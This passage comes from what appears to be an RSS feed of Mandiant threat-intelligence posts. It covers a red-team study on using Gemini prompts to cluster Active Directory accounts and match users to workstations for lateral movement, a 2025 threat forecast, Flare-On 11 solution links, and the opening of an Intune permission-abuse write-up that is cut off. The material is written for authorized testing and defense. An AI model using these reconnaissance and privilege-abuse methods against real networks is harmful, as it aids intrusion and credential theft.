name, displayname and sam. Only include results that are likely to be the same user. Only include results when there is a user with multiple accounts. It is possible that a user has more than two accounts. Please specify a reason why those accounts belong to the same user. Use the first (name) field to identify the accounts.</code></pre></div> <div class="block-paragraph_advanced"><h4><span style="vertical-align: baseline;">Results</span></h4> <p><span style="vertical-align: baseline;">The test dataset had about 900 users. We manually determined that some users have two to four accounts with various permissions. Some of these accounts had the same pattern like "user@test.local" and "adm-user@test.local." However, other accounts had patterns where the admin account was based on the first couple of letters. For example, their main account had the pattern matthijs.gielen@test.local, and the admin account was named: adm-magi@test.local. To keep track of those accounts, the description of the admin account contained some text similar to "admin account of Matthijs Gielen." </span></p> <p><span style="vertical-align: baseline;">With this prompt, Gemini managed to cluster 50 groups of accounts in our dataset. After manual verification, some of the results were discarded because they only contained one account in the cluster. This resulted in 43 correct clusters of accounts. Manually, we found the same correlation; however, where Gemini managed to output this information in a couple of minutes, manually this took quite a bit longer to analyze and correlate all accounts. This information was used in preparation for further attacks, as shown in the next use case.</span></p> <h3><span style="vertical-align: baseline;">Use Case 5: Correlation Between Users and Their Machines</span></h3> <p><span style="vertical-align: baseline;">Knowing which users to target or defend is often not enough. We also need to find them within the network in order to compromise them. Domain administrators are (usually) physical people; they need somewhere to type in their commands and perform administrative actions. This means that we need to correlate which domain administrator is working from which workstation. This is called session information, and BloodHound uses this information in an edge called "HasSession."</span></p> <p><span style="vertical-align: baseline;">In the past, it was possible to get all session information with a regular user during red teaming.</span></p> <p><span style="vertical-align: baseline;">Using the technique in Use Case 4, we can correlate the different user accounts that one employee may have. The next step is to figure out which workstation belongs to that employee. Then we can target that workstation, and from there, hopefully recover the passwords of their administrator accounts.</span></p> <p><span style="vertical-align: baseline;">In this case, employees have corporate laptops, and the company needs to keep track of which laptop belongs to which employee. Often this information is stored in one of the fields of the computer object in the Active Directory. However, there are many ways to do this, and using Gemini to parse the unstructured data is one such example.</span></p> <h4><span style="vertical-align: baseline;">Data Model</span></h4> <p><span style="vertical-align: baseline;">This model is quite simple, we just want to correlate machines to their users and have Gemini give us a reason why—to improve the output of the model. Because we will send all users and all computers at once, we will need a list of results.</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>class UserComputerCorrelation(BaseModel): user: str = Field(description="name of the user") computer: str = Field(description="name of the computer") reason: str = Field( description="Reason why these accounts belong to this user", default="" ) class CorrelationResults(BaseModel): results: list[UserComputerCorrelation] = Field( description="users and computers that correlate", default=[] )</code></pre></div> <div class="block-paragraph_advanced"><h4><span style="vertical-align: baseline;">Prompt</span></h4> <p><span style="vertical-align: baseline;">In the prompt, we give some examples of what kind of systems we are looking for:</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>Given the two data sets, find the computer that correlates to a user by checking for similarities in the name, displayname and sam. Only include results that are likely to correspond. Please specify a reason why that user and computer correlates. Use the first (name) field to identify the users and computers.</code></pre></div> <div class="block-paragraph_advanced"><h4><span style="vertical-align: baseline;">Results</span></h4> <p><span style="vertical-align: baseline;">The dataset used contains around 900 users and 400 computers. During the assignment, we determined that the administrators correlated users and their machines via the description field of the computer, which was sort of equal to the display name of the user. Gemini correctly picked up this connection, correctly correlating around 120 users to their respective laptops (Figure 3).</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/ai-adversarial-emulation-fig3a.max-1000x1000.png" alt="Connections between user and laptop as correlated by Gemini"> </a> <figcaption class="article-image__caption "><p data-block-key="lift0">Figure 3: Connections between user and laptop as correlated by Gemini</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">Gemini helped us to select an appropriate workstation, which enabled us to perform lateral movement to a workstation and obtain the password of an administrator, getting us closer to our goal.</span></p> <p><span style="vertical-align: baseline;">To defend against these threats, it can be valuable to run tools like BloodHound in the network. As discussed, BloodHound might not find all the "hidden" edges in your network, but you can add these yourself to the graph. This will allow you to find more Active Directory-based attack paths that are possible in your network and mitigate these before an attacker has an opportunity to exploit those attack paths.</span></p> <h2><span style="vertical-align: baseline;">Conclusion</span></h2> <p><span style="vertical-align: baseline;">In this blog post, we looked at processing red team data using LLMs to aid in adversarial emulation or improving defenses. These use cases were related to processing human-generated, unstructured data. Table 3 summarizes the results.</span></p></div> <div class="block-paragraph_advanced"><div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table border="1px" cellpadding="16px" style="border-collapse: collapse; margin-left: auto; margin-right: auto;"><colgroup><col/><col/><col/></colgroup> <tbody> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><strong style="vertical-align: baseline;">Use Case</strong></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><strong style="vertical-align: baseline;">Accuracy of the Results</strong></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><strong style="vertical-align: baseline;">Usefulness</strong></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Roles</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">High</strong><span style="vertical-align: baseline;">: There were a few false positives that were in the gray area.</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">High</strong><span style="vertical-align: baseline;">: Especially when going through a large list of roles of users, this approach will provide fairly fast results.</span></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Credentials in files</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">High</strong><span style="vertical-align: baseline;">: Found more credentials than comparable tools. More testing should look into the false-positive rate in real scenarios.</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Medium</strong><span style="vertical-align: baseline;">: This approach finds a lot more results; however, processing it with Gemini is a lot slower (five seconds per file) than many other alternatives.</span></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">High-value targets</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Medium</strong><span style="vertical-align: baseline;">: Not all results were new, nor were all high-value targets.</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Medium</strong><span style="vertical-align: baseline;">: Some of the results were useful; however, all of them still require manual verification.</span></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Account clustering</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">High</strong><span style="vertical-align: baseline;">: After taking into account the clusters with one account, the other ones were well clustered.</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">High</strong><span style="vertical-align: baseline;">: Clustering users is most of the time a tedious process to do manually. It gives fairly reliable results if you filter out the results with only one account.</span></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Computer correlation</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">High</strong><span style="vertical-align: baseline;">: All results were correctly correlated users to their computers.</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">High</strong><span style="vertical-align: baseline;">: This approach produces accurate results potentially providing insights into extra possible attack paths.</span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <p style="text-align: center;"><span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Table 3: The results of our experiments of data processing with Gemini</span></p> </div></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">As the results show, using an LLM like Gemini can help in converting this type of data into structured data to aid attackers and defenders. However, keep in mind that LLMs are not a silver bullet and have limitations. For example, they can sometimes produce false positives or be slow to process large amounts of data.</span></p> <p><span style="vertical-align: baseline;">There are quite a few use cases we have not covered in this blog post. Some other examples where you can use this approach are:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Correlating user groups to administrator privileges on workstations and servers</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Summarizing internal website content or documentation to search for target systems</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Ingesting documentation to generate password candidates for cracking passwords</span></p> </li> </ul> <h2><span style="vertical-align: baseline;">The Future</span></h2> <p><span style="vertical-align: baseline;">This was just an initial step that we on the Advanced Capabilities team on the Mandiant Red Team have explored so far when using LLMs for adversarial emulation and defense. For next steps, we know that the models and prompts can be improved by testing variations in the prompts, and other data sources can be investigated to see if Gemini can help analyze them. We are also looking at using linear regression models as well as clustering and pathfinding algorithms to enable cybersecurity practitioners to quickly evaluate attack paths that may exist in a network.</span></p></div></description><pubDate>Thu, 14 Nov 2024 14:00:00 +0000</pubDate><guid>https://cloud.google.com/blog/topics/threat-intelligence/ai-enhancing-your-adversarial-emulation/</guid><category>Threat Intelligence</category><og xmlns:og="http://ogp.me/ns#"><type>article</type><title>Pirates in the Data Sea: AI Enhancing Your Adversarial Emulation</title><description></description><site_name>Google</site_name><url>https://cloud.google.com/blog/topics/threat-intelligence/ai-enhancing-your-adversarial-emulation/</url></og><author xmlns:author="http://www.w3.org/2005/Atom"><name>Mandiant </name><title></title><department></department><company></company></author></item><item><title>Emerging Threats: Cybersecurity Forecast 2025</title><link>https://cloud.google.com/blog/topics/threat-intelligence/cybersecurity-forecast-2025/</link><description><div class="block-paragraph_advanced"><p>Every November, we start sharing forward-looking insights on threats and other cybersecurity topics to help organizations and defenders prepare for the year ahead. The Cybersecurity Forecast 2025 report, available today, plays a big role in helping us accomplish this mission.</p> <p>This year’s report draws on insights directly from Google Cloud's security leaders, as well as dozens of analysts, researchers, responders, reverse engineers, and other experts on the frontlines of the latest and largest attacks. </p></div> <div class="block-aside"><dl> <dt>aside_block</dt> <dd>&lt;ListValue: [StructValue([(&#x27;title&#x27;, &#x27;Cybersecurity Forecast 2025&#x27;), (&#x27;body&#x27;, &lt;wagtail.rich_text.RichText object at 0x3ee3d271e700&gt;), (&#x27;btn_text&#x27;, &#x27;Download now&#x27;), (&#x27;href&#x27;, &#x27;https://cloud.google.com/security/resources/cybersecurity-forecast?utm_source=cgc-blog&amp;utm_medium=blog&amp;utm_campaign=FY24-Q4-global-MAND1370-website-dl-dgcsm-security-forecast-2025&amp;utm_content=cgc-blog&amp;utm_term=-&#x27;), (&#x27;image&#x27;, &lt;GAEImage: Cybersecurity Forecast 2025 cover&gt;)])]&gt;</dd> </dl></div> <div class="block-paragraph_advanced"><h2><span style="vertical-align: baseline;">Key Threat Findings</span></h2> <p><span style="vertical-align: baseline;">Built on trends we are already seeing today, the Cybersecurity Forecast 2025 report provides a realistic outlook of what organizations can expect to face in the coming year. The report covers a lot of topics across all of cybersecurity, with a focus on various threats such as:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Attacker Use of Artificial Intelligence (AI):</strong><span style="vertical-align: baseline;"> Threat actors will increasingly use AI for sophisticated phishing, vishing, and social engineering attacks. They will also leverage deepfakes for identity theft, fraud, and bypassing security measures.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">AI for Information Operations (IO):</strong><span style="vertical-align: baseline;"> IO actors will use AI to scale content creation, produce more persuasive content, and enhance inauthentic personas.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">The Big Four:</strong><span style="vertical-align: baseline;"> Russia, China, Iran, and North Korea will remain active, engaging in espionage operations, cyber crime, and information operations aligned with their geopolitical interests.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Ransomware and Multifaceted Extortion:</strong><span style="vertical-align: baseline;"> Ransomware and multifaceted extortion will continue to be the most disruptive form of cyber crime, impacting various sectors and countries.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Infostealer Malware:</strong><span style="vertical-align: baseline;"> Infostealer malware will continue to be a major threat, enabling data breaches and account compromises.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Democratization of Cyber Capabilities:</strong><span style="vertical-align: baseline;"> Increased access to tools and services will lower barriers to entry for less-skilled actors.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Compromised Identities:</strong><span style="vertical-align: baseline;"> Compromised identities in hybrid environments will pose significant risks.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Web3 and Crypto Heists:</strong><span style="vertical-align: baseline;"> Web3 and cryptocurrency organizations will increasingly be targeted by attackers seeking to steal digital assets.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Faster Exploitation and More Vendors Targeted:</strong><span style="vertical-align: baseline;"> The time to exploit vulnerabilities will continue to decrease, and the range of targeted vendors will expand.</span></p> </li> </ul> <h2><span style="vertical-align: baseline;">Be Prepared for 2025</span></h2> <p><span style="vertical-align: baseline;">Read the <a href="https://cloud.google.com/security/resources/cybersecurity-forecast?utm_source=cgc-blog&amp;utm_medium=blog&amp;utm_campaign=FY24-Q4-global-MAND1370-website-dl-dgcsm-security-forecast-2025&amp;utm_content=cgc-blog&amp;utm_term=-">Cybersecurity Forecast 2025</a> report for a more in-depth look at these and other threats, as well as other security topics such as post-quantum cryptography, and insights unique to the JAPAC and EMEA regions. </span></p> <p><span style="vertical-align: baseline;">For an even deeper look at the threat landscape next year, register for our </span><a href="https://www.brighttalk.com/webcast/7451/629092" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Cybersecurity Forecast 2025 webinar</span></a><span style="vertical-align: baseline;">, which will be hosted once again by threat expert Andrew Kopcienski.</span></p> <p><span style="vertical-align: baseline;">For even more insights, hear directly from our <a href="https://www.youtube.com/playlist?list=PLjiTz6DAEpuKpOI-pJmJkoqdyqj6B1DXK" rel="noopener" target="_blank">security leaders</a>: Charles Carmakal, Sandra Joyce, Sunil Potti, and Phil Venables.</span></p></div></description><pubDate>Wed, 13 Nov 2024 14:00:00 +0000</pubDate><guid>https://cloud.google.com/blog/topics/threat-intelligence/cybersecurity-forecast-2025/</guid><category>Threat Intelligence</category><og xmlns:og="http://ogp.me/ns#"><type>article</type><title>Emerging Threats: Cybersecurity Forecast 2025</title><description></description><site_name>Google</site_name><url>https://cloud.google.com/blog/topics/threat-intelligence/cybersecurity-forecast-2025/</url></og><author xmlns:author="http://www.w3.org/2005/Atom"><name>Adam Greenberg</name><title>Content Marketing Manager, Mandiant</title><department></department><company></company></author></item><item><title>Flare-On 11 Challenge Solutions</title><link>https://cloud.google.com/blog/topics/threat-intelligence/flareon-11-challenge-solutions/</link><description><div class="block-paragraph_advanced"><p>Written by: Nick Harbour</p> <hr/></div> <div class="block-paragraph_with_image"><div class="article-module h-c-page"> <div class="h-c-grid uni-paragraph-wrap"> <div class="uni-paragraph h-c-grid__col h-c-grid__col--8 h-c-grid__col-m--6 h-c-grid__col-l--6 h-c-grid__col--offset-2 h-c-grid__col-m--offset-3 h-c-grid__col-l--offset-3"> <figure class="article-image--wrap-small " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/flare-on11-medal.max-1000x1000.png" alt="Flare-On 11 medal"> </a> </figure> <p data-block-key="2xct5">The eleventh Flare-On challenge is now over! This year proved to be a tough challenge for the over 5,300 players, with only 275 completing all 10 stages. We had a blast making this contest and are happy to see it continue to be a world-wide phenomenon. Those that finished all stages this year may be eligible to receive this elite desk trophy to the envy of your coworkers and family.</p> </div> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">We would like to thank the challenge authors individually for their great puzzles and solutions:</span></p> <ol> <li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">frog - Nick Harbour (@nickharbour)</span></p> </li> <li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">checksum - Chuong Dong (@cPeterr)</span></p> </li> <li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">aray - Jakub Jozwiak</span></p> </li> <li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">FLARE Meme Maker 3000 - Moritz Raabe (@m_r_tz)</span></p> </li> <li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">sshd - Christopher Gardner (@t00manybananas)</span></p> </li> <li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">bloke2 - Dave Riley (@6502_ftw)</span></p> </li> <li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">fullspeed - Sam Kim</span></p> </li> <li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Clearly Fake - Blas Kojusner (@bkojusner)</span></p> </li> <li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">serpentine - Mustafa Nasser (@d35ha)</span></p> </li> <li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">CATBERT Ransomware - Mark Lechtik (@_marklech_)</span></p> </li> </ol> <p><span style="vertical-align: baseline;">This year’s challenge hosted 5,324 registered users, with 3,066 of them solving at least one stage. The difficulty curve ended up smoother than last year’s, with a nice progression of people falling off at stages 5, 7, and 9. Coincidentally, based on finisher feedback those were also the consensus favorite challenges this year. Does that mean we should up the difficulty next time?</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/flare-on11-solves.max-1000x1000.png" alt="Flare-On 11 solves"> </a> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">Last year Germany was far out ahead of the leaderboard with 19 finishers to 2nd place Singapore’s 15. This year Vietnam takes the lead with 21 finishers and the USA comes in second with 20.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/flare-on11-finishers.max-1000x1000.png" alt="Flare-On 11 finishers"> </a> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">All the binaries from this year’s challenge are now posted on the </span><a href="http://flare-on.com/files/Flare-On11_Challenges.zip" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Flare-On website</span></a><span style="vertical-align: baseline;">. Here are the solutions written by each challenge author:</span></p> <ol> <li><a href="https://services.google.com/fh/files/misc/flare-on11-challenge1-frog.pdf" rel="noopener" target="_blank">SOLUTION #1</a></li> <li><a href="https://services.google.com/fh/files/misc/flare-on11-challenge2-checksum.pdf" rel="noopener" target="_blank">SOLUTION #2</a></li> <li><a href="https://services.google.com/fh/files/misc/flare-on11-challenge3-aray.pdf" rel="noopener" target="_blank">SOLUTION #3</a></li> <li><a href="https://services.google.com/fh/files/misc/flare-on11-challenge4-flare-meme-maker-3000.pdf" rel="noopener" target="_blank">SOLUTION #4</a></li> <li><a href="https://services.google.com/fh/files/misc/flare-on11-challenge5-sshd.pdf" rel="noopener" target="_blank">SOLUTION #5</a></li> <li><a href="https://services.google.com/fh/files/misc/flare-on11-challenge6-bloke2.pdf" rel="noopener" target="_blank">SOLUTION #6</a></li> <li><a href="https://services.google.com/fh/files/misc/flare-on11-challenge7-fullspeed.pdf" rel="noopener" target="_blank">SOLUTION #7</a></li> <li><a href="https://services.google.com/fh/files/misc/flare-on11-challenge8-clearly-fake.pdf" rel="noopener" target="_blank">SOLUTION #8</a></li> <li><a href="https://services.google.com/fh/files/misc/flare-on11-challenge9-serpentine.pdf" rel="noopener" target="_blank">SOLUTION #9</a></li> <li><a href="https://services.google.com/fh/files/misc/flare-on11-challenge10-catbert-ransomware.pdf" rel="noopener" target="_blank">SOLUTION #10</a></li> </ol></div></description><pubDate>Fri, 08 Nov 2024 20:00:00 +0000</pubDate><guid>https://cloud.google.com/blog/topics/threat-intelligence/flareon-11-challenge-solutions/</guid><category>Threat Intelligence</category><og xmlns:og="http://ogp.me/ns#"><type>article</type><title>Flare-On 11 Challenge Solutions</title><description></description><site_name>Google</site_name><url>https://cloud.google.com/blog/topics/threat-intelligence/flareon-11-challenge-solutions/</url></og><author xmlns:author="http://www.w3.org/2005/Atom"><name>Mandiant </name><title></title><department></department><company></company></author></item><item><title>(In)tuned to Takeovers: Abusing Intune Permissions for Lateral Movement and Privilege Escalation in Entra ID Native Environments</title><link>https://cloud.google.com/blog/topics/threat-intelligence/abusing-intune-permissions-entra-id-environments/</link><description><div class="block-paragraph_advanced"><p>Written by: Thibault Van Geluwe de Berlaere, Karl Madden, Corné de Jong</p> <hr/></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">The Mandiant Red Team recently supported a client to visualize the possible impact of a compromise by an advanced threat actor. During the assessment, Mandiant moved laterally from the customer’s on-premises environment to their Microsoft Entra ID tenant and obtained privileges to compromise existing Entra ID service principals installed in the tenant. </span></p> <p><span style="vertical-align: baseline;">In this blog post, we will show a novel way of how adversaries can move laterally and elevate privileges within Microsoft Entra ID when organizations use a popular security architecture involving Intune-managed Privileged Access Workstations (PAWs) by abusing Intune permissions (</span><span style="font-style: italic; vertical-align: baseline;">DeviceManagementConfiguration.ReadWrite.All</span><span style="vertical-align: baseline;">) granted to Entra ID service principals. We also provide remediation steps and recommendations to prevent and detect this type of attack.</span></p> <h2><span style="vertical-align: baseline;">Pretext</span></h2> <p><span style="vertical-align: baseline;">The customer had a mature security architecture following Microsoft’s recommended </span><a href="https://aka.ms/AccessModel" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Enterprise Access</span></a><span style="vertical-align: baseline;"> model, including:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">An on-premises environment using Active Directory, following the </span><a href="https://aka.ms/ESAE#best-practice-for-securing-on-premises-ad" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Tiered Model</span></a><span style="vertical-align: baseline;">. </span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">An Entra ID environment, synced to the on-premises environment using Microsoft Entra Connect Sync to synchronize on-premises identities and groups to Entra ID. This environment was administered using PAWs, which were not joined to the on-premises Active Directory environment, but instead were fully cloud-native and managed by Intune Mobile Device Management (MDM). IT administrators used a dedicated, cloud-native (non-synced) administrative account to log in to these systems. Entra ID role assignments (</span><span style="font-style: italic; vertical-align: baseline;">Global Administrator</span><span style="vertical-align: baseline;">, </span><span style="font-style: italic; vertical-align: baseline;">Privileged Role Administrator</span><span style="vertical-align: baseline;">, et cetera.) were exclusively assigned to these cloud-native administrative accounts.</span></p> </li> </ul> <p><span style="vertical-align: baseline;">The separation of administrative accounts, devices and privileges between the on-premises environment and the Entra ID environment provided a strong security boundary:</span></p> <ol> <li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Using separate, cloud-native identities for Entra ID privileged roles ensures a compromise of the on-premises Active Directory cannot be used to compromise the Entra ID environment. This is a </span><a href="https://learn.microsoft.com/en-us/entra/identity/role-based-access-control/best-practices#9-use-cloud-native-accounts-for-microsoft-entra-roles" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Microsoft best practice</span></a><span style="vertical-align: baseline;">.</span></p> </li> <li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Using separate physical workstations for administrative access to on-premises resources and cloud resources effectively creates an ‘air gap’ between the administration plane of the two environments. Air gaps are especially difficult for attackers to cross.</span></p> </li> <li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">The administrative accounts in Entra ID were assigned roles through Privileged Identity Management enforced by strong Conditional Access policies, requiring a managed, compliant device and multi-factor authentication. These are also Microsoft-recommended </span><a href="https://learn.microsoft.com/en-us/entra/identity/role-based-access-control/best-practices#2-use-privileged-identity-management-to-grant-just-in-time-access" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">best</span></a><span style="vertical-align: baseline;"> </span><a href="https://learn.microsoft.com/en-us/entra/identity/role-based-access-control/best-practices#3-turn-on-multi-factor-authentication-for-all-your-administrator-accounts" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">practices</span></a><span style="vertical-align: baseline;">.</span></p> </li> </ol> <h2><span style="vertical-align: baseline;">Attack Path</span></h2> <p><span style="vertical-align: baseline;">As part of the assessment objectives, the Mandiant Red Team was tasked with obtaining </span><span style="font-style: italic; vertical-align: baseline;">Global Administrator</span><span style="vertical-align: baseline;"> privileges in the Entra ID tenant. Through various techniques out of scope for this blog post, Mandiant obtained privileges in the Entra ID tenant to add credentials to Entra ID service principals (</span><span style="font-style: italic; vertical-align: baseline;">microsoft.directory/servicePrincipals/credentials/update</span><span style="vertical-align: baseline;">), allowing the Red Team to compromise any preinstalled service principal.</span></p> <p><span style="vertical-align: baseline;">A few publicly <a href="https://www.secura.com/blog/compromising-azure-cloud-through-sensitive-api-permissions" rel="noopener" target="_blank">known</a> <a href="https://cloudbrothers.info/en/prem-global-admin-password-reset/" rel="noopener" target="_blank">techniques</a></span><span style="vertical-align: baseline;"> exist to abuse service principal privileges to obtain elevated permissions, most notably using the </span><span style="font-style: italic; vertical-align: baseline;">RoleManagement.ReadWrite.Directory</span><span style="vertical-align: baseline;">, </span><span style="font-style: italic; vertical-align: baseline;">AppRoleAssignment.ReadWrite.All</span><span style="vertical-align: baseline;"> and </span><span style="font-style: italic; vertical-align: baseline;">Application.ReadWrite.All</span><span style="vertical-align: baseline;"> Microsoft Graph permissions. </span></p> <p><span style="vertical-align: baseline;">None of these permissions were in use in the customer’s environment though, forcing the Mandiant Red Team to rethink their strategy. </span></p> <p><span style="vertical-align: baseline;">Mandiant used the excellent <a href="https://github.com/dirkjanm/ROADtools" rel="noopener" target="_blank">ROADTools</a></span><span style="vertical-align: baseline;"><a href="https://github.com/dirkjanm/ROADtools" rel="noopener" target="_blank"> framework</a> to gain further insight into the customer’s Entra ID environment, and discovered a service principal that was granted the </span><span style="vertical-align: baseline;"> </span><span style="font-style: italic; vertical-align: baseline;">DeviceManagementConfiguration.ReadWrite.All</span><span style="vertical-align: baseline;"> permission.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/intuned-cloud-fig1.max-1000x1000.png" alt="Service Principal was granted DeviceManagementConfiguration.ReadWrite.All permissions (screenshot from ROADTools)"> </a> <figcaption class="article-image__caption "><p data-block-key="ak36s">Figure 1: Service principal was granted DeviceManagementConfiguration.ReadWrite.All permissions (screenshot from ROADTools)</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">This permission allows the service principal to "</span><a href="https://learn.microsoft.com/en-us/graph/permissions-reference#devicemanagementconfigurationreadwriteall" rel="noopener" target="_blank"><span style="font-style: italic; vertical-align: baseline;">read and write Microsoft Intune device configuration and policies</span></a><span style="vertical-align: baseline;">".</span></p> <p><span style="vertical-align: baseline;">Intune’s <a 